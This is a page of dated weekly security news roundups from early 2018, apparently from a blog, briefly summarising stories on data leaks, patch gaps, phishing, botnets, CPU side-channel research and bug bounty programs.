Security Roundup - 2018-04-19

RSA attendee list exposed. Attended RSA? A subset of your data turned out to be decryptable by reverse engineering the mobile app and grabbing the sqlite database from a publically accessable api endpoint. This is apparently similar functionality to their 2014 mobile app.

Android patch gap. The android ecosystem already suffers from lags in security patches, due to a fragmented OS and manufacturer ecosystem. Now security researchers have found that even when manufacturers apply patches, they may not include all security updates. In some cases, this appears to be deliberate, with at least one vendor changing patch numbers without actually updating code, potentially misleading users.

A day in the life of a CISO. While no two days are ever quite the same Cory Scott, CISO of LinkedIn, attempts to put together what an average day as a CISO is like for him.

Abusing Google Tag Manager for fun and profit. Google Tag Manager lets site admins create custom scripts they can reference on their site for loading. Sucuri goes over how an attacker with write privileges could subtly load malicious scripts by copying your script, adding their own content, and then changing content on your site. This assumes they are able to modify content on your site, but with the number of CMSes with exploits…

Microsoft Outlook bug exposes account information. A large bug has been found in Microsoft Outlook previews, where previews of RTF documents that happen to have remote samba content will helpfully attempt to reach out to the server, leaking user information like IP Address, windows domain, username, machine name, and a session password hash which an attacker could break to get a user’s password.

The early internet lacked security because… Believe that the early internet did not have security built in because of ‘open networks’ and ‘inherent trust’? You may want to fact check against the US export regulations against cryptography. Engineers were essentially torn between adoption and interoperatibility or having all their systems being restricted by export control. Can you imagine a world in which the US had its own network, European nations another, etc? And you think getting on wi-fi at an airport is bad NOW…

Botnets kept on their toes. Two prominent botnets have had their work cut out for them, as researchers have focused on identifying and defanging. The first is Smoke Loader, which Microsoft has spent considerable time providing countermeasures for, and the malware authors trying to develop new workarounds. The second is EITest a major botnet used to redirect users to malware and tech support scams has had key C&C infrastructure taken over, effectively dismantling the entire operation.

A study of login abuse. Akamai recently unveiled some research into fraudulent login activity for API based login activity. This type of login is largely service to service. Their research indicates that 30% of all api login requests they observed are fraudulent.

More abuse of Facebook data. Security researchers found that malicious scripts could abuse the login with Facebook functionality to harvest user data, including name, email address and profile photo. In one case, the data was accidentally made available to any javascript running on a site.

2018 Tax Fraud Shenanigans. Brian Krebs points out some new ‘fun’ for tax fraud. His article contains not only a story of a CPA who had their account compromised for weeks (and thus a fair number of his clients having their returns stolen), but also an extension of IT Support fraud - tax refund fraud.

Security Roundup - 2018-04-12

The ‘convenience’ of a bluetooth credit card. Who would have imagined that wirelessly enabling credit cards would be a problem? Several ‘consolidated’ credit cards have hit the market in the last few years and now researchers have broken into them. In particular, the FUZE card can be broken into with a only seconds of physical access (like, when you hand it over to pay), where credit card details can be downloaded over bluetooth as long as the card remains in range.

Phishing attacks can leverage email handling discrepencies. Did you know that Gmail ignores the . character in email addresses? A software engineer discovered this the other day when they received an unexpected from Netflix that a credit card had been declined. Only it wasn’t their credit card, but someone else’s account with a . in the email address. Was this an honest mistake? Or potentially a new scam to try to collect accounts being paid off by unsuspecting people?

Harmless social quiz, or tactical information harvesting? Have you even thought about how much information you are potentially giving away with small quizes on social sites? Have you even thought about these questions and felt some of them may be very similar to your password recovery questions?

2017 Hacked Website Report. Sucuri has released their annual hacked website report. There are some interesting items including:

  • Wordpress is the most prevalent CMS, and the one that is most likely to be up to date. BUT since it is so common it also ends up being the platform with the most infections over the same period.
  • Only 17% of websites Sucuri identified as compromised ended up on blacklists in the same interval.
  • The number of infected files needing cleaning almost doubled YoY, demonstrated an increase in depth of compromise.

How (not) to do session management What happens when you design session managements where sessions are timestamps and never seem to expire? This blog post for one, where one researcher noticed he could effectively gain access to any client’s files for a specific cloud data storage company.

Malware code signing abuse deep dive. We’ve talked about malware code signing recently, but Trend Micro does a further deep dive on the topic. Interestingly, they see more signed malware than signed legitimate apps.

On the lifecycle of exploit development. There is obviously much interest in how long it takes from an exploit to be known to being used in the wild. One security researcher was surprised to discover that some SQLi injection vulnerabilities he had documented had not been used and decided to find out why. This seems to be in part due to malicious actors monitoring certain sites, where if an exploit is not disclosed on those sites it might be ignored.

Security Roundup - 2018-04-05

Panera bread data leak. The big news this week was Panera’s treatment of a security disclosure, where they did not address a security flaw that exposed user information for 8 months. Panera was driven to take action only after the security researcher reached out to Brian Krebs, who published a scathing article of the details. You can read the researcher’s story here.

Honeypot meat HoneyBot. In an ever increasingly connected world, there is increased concern about security surrounding connected devices, including robots. Now, one set of researchers have started experimenting with HoneyBots, taking the concept of a honeypot where researchers observe malicious users and applying the same concept to robots.

Chat Widgets leak PII. Security researchers discovered a number of live chat systems, used by companies including Google, Verizon and Disney, were leaking actual employee names and other identifying details. This could lead to tailored social engineering attacks, or even directed harrasment of employees.

Obfuscation through legitimate appearances. Analysts at Sucuri had fun analyzing what at first glance may look like an innocent file with proper code structure, but turned out to be obfuscated wordpress malware.

Privacy in DNS. While the push for TLS to provide secure communications continues, others have decided to look at other points of internet privacy. Now, while communications over TLS may be unknowable, someone still knows who you are calling due to DNS. There are now numerous researchers looking at this problem, from OpenDNS who has run DNSCrypt for several years, Cloudflare who is pushing DNS over TLS and just launched a new resolver, and even academic researchers in Princeton who are working on Oblivious DNS.

Security Roundup - 2018-03-29

Processor based attacks continue to be researched. It should surprise no one that security researchers have begun a close inspection of the hardware platforms our software runs on. The latest one, called BranchPredictor, appears to be a compliment of Spectre. Where Spectre leverages cached branch predictions, BranchPredictor tries to prime branch prediction for exploitation. Meanwhile, Microsoft’s released a bad patch for Meltdown on Windows 7 machines allowing programs to read and write to arbitrary memory locations (including what would otherwise be protected kernel memory).

Your library account has expired. That is the beginning of a highly effective phishing hook that a set of hackers used for years resulting in hacks into at least 300 universities. The phishing lures were so successful that the text rarely changed over the course of four years, according to researchers into these campaigns.

DNS over HTTPS promises security, bring privacy concerns. DNS is one of the primary protocols used on the internet. It was, however, not built with security or privacy in mind, meaning that anyone able to monitor your traffic can what servers a user is trying to contact. DNS over HTTPS (DoH) is a proposed solution undergoing discussion at the IETF. In the wake of Facebook’s privacy leaks, privacy advocates worry that one level of privacy protection will enable more centralized points of spying.

Invasive introspection of microcontroller firmware. How far do you think one is willing to take to reverse engineer programs on a hardware chip? Researchers at Duo Security show you just how far down the rabbit hole they have gone.

GoScanSSH targets multiple devices. A new malware straing that has been active since at least June 2017 has been discovered by TalosIntel. What is of interest of this malware is its leveraging of Golang to target multiple hardware architectures. The software itself uses an extensive list of 7K usernames and passwords to break in, as well as a blacklist of IP blocks to try to avoid the scrutiny of government actors.

Security Roundup - 2018-03-22

Pwn2Own 2018 Results. This year’s Pwn2Own competition - where browser and virtual machine vendors challenge hackers to break their protections - has concluded, and like previous years a number of exploits have been discovered in major browsers, resulting in a grand total of $267K in bounties being paid out across the two days.

BitTorrent software victim of supply chain attack. The latest reported supply chain attack has occured against BitTorrent client Mediaget resulting in 400K machines being infected in just 12 hours. The attack was unsuccessful as Windows Defender picked up on the cryptominer and prevented the install.

Burying your head in the sand. In what appears to be a case of willful ignorance, check out this story about a company who appears to be ignoring news about their data being exposed. Allegedly, the company in question is making it as hard as possible for someone to disclose, even going as far as to block them on Twitter.

Chrome Extension designed to thwart CPU sidechannel attacks. Researchers that have contributed to CPU sidechannel investigation (including Rowhammer, Meltdown, and Spectre have used their findings to identify several categories these attacks exploit and then build a defense for them. Released as the browser extension ‘Chrome Zero’, the application intercepts javescript and rewrites it before it gets interpreted, attempting to try to neutralize any side channels that could be exploited.

More IoT Vulnerabilities. A number of high valued CVEs have been issued for a number of IP enabled security cameras. The flaws have such far reaching consequences that the manufacturer has opted to release an update to fix them, despite some of the products actually being end of life.

Breaking into encrypted external hard drives. I found this article of one user’s hobby of breaking into encrypted hard drives fascinating. This is one of those external hard drives that has hardware encryption and keypads to unlock the device, and the interested party here figured out how to actually pull the pin from the hardware.

Cryptocurrency hardware wallet defeated by teenager. In a similar story, a cryptocurrency wallet was reported to have security flaws that could allow attackers to install custom software on it, and this was discovered by a 15 year old. The flaw stems from the fact that the device has both a secure processor and an insecure processor, but since the two can (and have to!) communicate potential allows atttackers to siphon off keys.

Bug Bounty Bonanza. Lots of prominent bug bounty news lately, starting with Microsoft announcing a big bounty for CPU flaws like Spectre and Meltdown, with a bounty of up to $250K. Second, Box has announced updates to their Vulnerability Disclosure Program (VDP), simplifying their guidelines to bring simplicity and clarity to the process and better protect white hats from potential legal threats. Finally, Netlfix has announced their own public bug bounty program, after running a VDP for a number of years.

Page 2 of 23